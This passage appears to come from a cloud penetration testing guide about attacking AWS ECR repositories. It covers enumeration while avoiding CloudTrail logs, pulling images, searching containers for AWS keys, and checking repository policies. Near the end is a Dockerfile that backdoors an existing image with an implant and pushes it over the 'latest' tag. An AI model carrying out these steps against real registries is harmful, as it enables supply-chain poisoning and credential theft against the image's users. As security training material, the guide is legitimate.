Elastic Container Registry (ECR)

ECR is described as a fully managed Docker container registry that makes it easy for developers to store, manage, and deploy Docker container images (https://aws.amazon.com/ecr/). The permissions model that it uses can allow for some nasty misconfigurations if a repository isn't set up correctly, mainly because, by design, ECR repositories can be made public or shared with other accounts. This means that, even if we only have a small amount of access, a misconfigured repository could grant us large amounts of access to an environment, depending on what is stored in the Docker images it is hosting.

If we are targeting public repositories in another account, then the main piece of information we need is the ID of the account hosting the repositories. There are a few ways of getting it. If you have credentials for the account you are targeting, the easiest way is to use the Security Token Service (STS) GetCallerIdentity API, which will return some information about the current caller, including the account ID. That command would look like this:

aws sts get-caller-identity

The problem with this is that it is logged to CloudTrail and clearly shows that you are trying to gather information about your user and the account you're in, which could raise red flags for a defender. There are other methods as well, particularly based on research from Rhino Security Labs, who released a script that enumerates a small amount of information about the current account without ever touching CloudTrail. It works through the verbose error messages that certain services disclose; because those services weren't yet supported by CloudTrail at the time, there was no record of the API calls being made, but the caller still gathered some information, including the account ID (https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/).

If you are targeting repositories in the account that you have compromised and are using those credentials for these API calls, then the account ID won't matter, because most ECR APIs will default to the current account automatically. The first thing we will want to do is list out the repositories in the account. This can be done with the following command (if you are targeting a different account, pass that account ID to the --registry-id argument):

aws ecr describe-repositories --region us-west-2

This should list out the repositories in the current region, including their ARN, registry ID, name, URL, and when they were created. Our example returned the following output:

{
    "repositories": [
        {
            "repositoryArn": "arn:aws:ecr:us-west-2:000000000000:repository/example-repo",
            "registryId": "000000000000",
            "repositoryName": "example-repo",
            "repositoryUri": "000000000000.dkr.ecr.us-west-2.amazonaws.com/example-repo",
            "createdAt": 1545935093.0
        }
    ]
}
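If there are many repositories to sift through, it can help to pull just the names and URIs out of that response. The following is a small sketch that parses the describe-repositories JSON (here embedded as the sample output from above; in practice you would save the CLI output to a file and load it from there):

```python
import json

# Sample output from `aws ecr describe-repositories` (account ID redacted),
# embedded here for illustration; normally you would redirect the CLI output
# to a file and read it instead
sample = '''
{
    "repositories": [
        {
            "repositoryArn": "arn:aws:ecr:us-west-2:000000000000:repository/example-repo",
            "registryId": "000000000000",
            "repositoryName": "example-repo",
            "repositoryUri": "000000000000.dkr.ecr.us-west-2.amazonaws.com/example-repo",
            "createdAt": 1545935093.0
        }
    ]
}
'''

def repo_uris(describe_output):
    """Map each repository name to its URI from describe-repositories JSON."""
    data = json.loads(describe_output)
    return {r["repositoryName"]: r["repositoryUri"] for r in data["repositories"]}

print(repo_uris(sample))
```

The URIs this produces are what we will need later when pulling images with Docker.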

We can then fetch all of the images stored in that repository with the ListImages command. That will look something like this for the example-repo we found previously:

aws ecr list-images --repository-name example-repo --region us-west-2

This command will give us a list of images, including their digest and image tag:

{
    "imageIds": [
        {
            "imageDigest": "sha256:afre1386e3j637213ab22f1a0551ff46t81aa3150cbh3b3a274h3d10a540r268",
            "imageTag": "latest"
        }
    ]
}
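Not every image in a repository will have a tag, so when scripting this it is worth building pull references that fall back to the digest. The following sketch turns the list-images output (sample data from above) into references that docker pull will accept, using the uri:tag form when a tag exists and the uri@digest form otherwise:

```python
import json

# Repository URI from the earlier describe-repositories call, plus the
# sample list-images output from above (digest is the redacted example)
repo_uri = "000000000000.dkr.ecr.us-west-2.amazonaws.com/example-repo"
list_images_output = '''
{
    "imageIds": [
        {
            "imageDigest": "sha256:afre1386e3j637213ab22f1a0551ff46t81aa3150cbh3b3a274h3d10a540r268",
            "imageTag": "latest"
        }
    ]
}
'''

def pull_refs(repo_uri, list_images_json):
    """Build docker pull references: uri:tag when tagged, uri@digest otherwise."""
    refs = []
    for image in json.loads(list_images_json)["imageIds"]:
        if "imageTag" in image:
            refs.append(f"{repo_uri}:{image['imageTag']}")
        else:
            refs.append(f"{repo_uri}@{image['imageDigest']}")
    return refs

print(pull_refs(repo_uri, list_images_output))
```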

Now we can (hopefully) pull this image to our local machine and run it, so that we can see what's inside. We can do this by running the following command (again, specify an external account ID in the --registry-id parameter if needed):

$(aws ecr get-login --no-include-email --region us-west-2)

The AWS command returns the docker command required to log you into the target registry, and the $() around it automatically executes that command and logs you in. You should see Login Succeeded printed to the console after running it. Note that get-login was removed in version 2 of the AWS CLI; there, the equivalent is to pipe get-login-password into docker login:

aws ecr get-login-password --region us-west-2 | docker login --username AWS --password-stdin 000000000000.dkr.ecr.us-west-2.amazonaws.com

Next, we can use Docker to pull the image, now that we are authenticated with the repository:

docker pull 000000000000.dkr.ecr.us-west-2.amazonaws.com/example-repo:latest

The Docker image should now be pulled down and will show up when you run docker images to list your local images:

Listing the example-repo Docker image after pulling it down

Next, we will want to run this image and drop ourselves into a bash shell within it, so then we can explore the filesystem and look for any goodies. We can do this with the following:

docker run -it --entrypoint /bin/bash 000000000000.dkr.ecr.us-west-2.amazonaws.com/example-repo:latest

Now our shell should switch from the local machine to the Docker container as the root user:

Using the Docker run command to enter a bash shell in the container we are launching

This is where you can employ your normal penetration testing techniques for searching around the operating system. You should be looking for things such as source code, configuration files, logs, environment files, or anything that sounds interesting, really.
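To speed up that search, a simple recursive scan for credential-shaped strings is often a good first pass. The following is a minimal sketch that walks a directory tree (for example, a container filesystem exported with docker export) looking for anything matching the AWS access key ID format; the pattern here only covers standard AKIA-prefixed keys, so treat it as a starting point rather than an exhaustive scanner:

```python
import os
import re

# Standard AWS access key IDs start with AKIA followed by 16 characters
KEY_PATTERN = re.compile(r"AKIA[0-9A-Z]{16}")

def find_access_keys(root):
    """Walk a directory tree and return (path, key) pairs for any matches."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="ignore") as f:
                    for match in KEY_PATTERN.findall(f.read()):
                        hits.append((path, match))
            except OSError:
                continue  # skip unreadable files (sockets, permission errors)
    return hits
```

Pointing this at the exported filesystem root will flag candidate keys, which can then be validated with sts get-caller-identity (keeping in mind the CloudTrail logging caveat from earlier).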

If any of those commands failed due to authorization issues, we could go ahead and check the policy associated with the repository we are targeting. This can be done with the GetRepositoryPolicy command:

aws ecr get-repository-policy --repository-name example-repo --region us-west-2

The response will be an error if no policy has been created for the repository; otherwise, it will return a JSON policy document that specifies what AWS principals can execute what ECR commands against the repository. You might find that only certain accounts or users are able to access the repository, or you might find that anyone can access it (such as if the "*" principal is allowed).
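Since get-repository-policy returns the policy document as a JSON string nested inside the response (the policyText field), checking it by eye can be fiddly. The following sketch decodes that nested document and flags any Allow statements with a wildcard principal; the statement contents in the sample are illustrative, not taken from a real repository:

```python
import json

# Illustrative get-repository-policy response; policyText is itself a JSON
# document encoded as a string, which is why it is double-decoded below
sample_response = json.dumps({
    "registryId": "000000000000",
    "repositoryName": "example-repo",
    "policyText": json.dumps({
        "Version": "2008-10-17",
        "Statement": [
            {
                "Sid": "AllowAll",
                "Effect": "Allow",
                "Principal": "*",
                "Action": ["ecr:GetDownloadUrlForLayer", "ecr:BatchGetImage"]
            }
        ]
    })
})

def open_statements(response_json):
    """Return Allow statements whose principal is the wildcard '*'."""
    policy = json.loads(json.loads(response_json)["policyText"])
    open_stmts = []
    for stmt in policy.get("Statement", []):
        principal = stmt.get("Principal")
        wildcard = principal == "*" or (
            isinstance(principal, dict) and principal.get("AWS") == "*"
        )
        if stmt.get("Effect") == "Allow" and wildcard:
            open_stmts.append(stmt)
    return open_stmts

print(open_statements(sample_response))
```

Any statement this flags means the repository is effectively public for the listed actions.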

If you have the correct push permissions to ECR, another attack worth trying would be to implant malware in one of the existing images, then push an update to the repository so that anyone who then uses that image will launch it with your malware running. Depending on the workflow the target uses behind the scenes, it may take a long time to discover this kind of backdoor in their images if done correctly.
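As a sketch of how that might look, the following Dockerfile stacks a new layer on top of the pulled image. The implant.sh payload and its path are purely hypothetical, and the image's original ENTRYPOINT/CMD (discoverable via docker inspect) would need to be preserved so that the image still behaves normally after the modification:

```dockerfile
# Build on top of the image pulled from the target registry
FROM 000000000000.dkr.ecr.us-west-2.amazonaws.com/example-repo:latest

# Hypothetical payload: copy in an implant and make it executable
COPY implant.sh /usr/local/bin/implant.sh
RUN chmod +x /usr/local/bin/implant.sh

# Launch the implant in the background, then hand off to the image's
# original entrypoint (replace /app-entrypoint.sh with the real one,
# found via docker inspect on the pulled image)
ENTRYPOINT ["/bin/sh", "-c", "/usr/local/bin/implant.sh & exec /app-entrypoint.sh"]
```

Rebuilding this with the repository URI as the tag and running docker push would then overwrite the latest tag in the registry for anyone who pulls it afterward.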

If you are aware of applications/services being deployed with these Docker images, such as through Elastic Container Service (ECS), then it might be worth looking for vulnerabilities within the container that you might be able to externally exploit, to then gain access to those servers. To help with this, it might be useful to do static vulnerability analysis on the various containers using tools such as Anchore Engine (https://github.com/anchore/anchore-engine), Clair (https://github.com/coreos/clair), or any others of the many available online. The results from those scans could help you identify known vulnerabilities that you might be able to take advantage of.
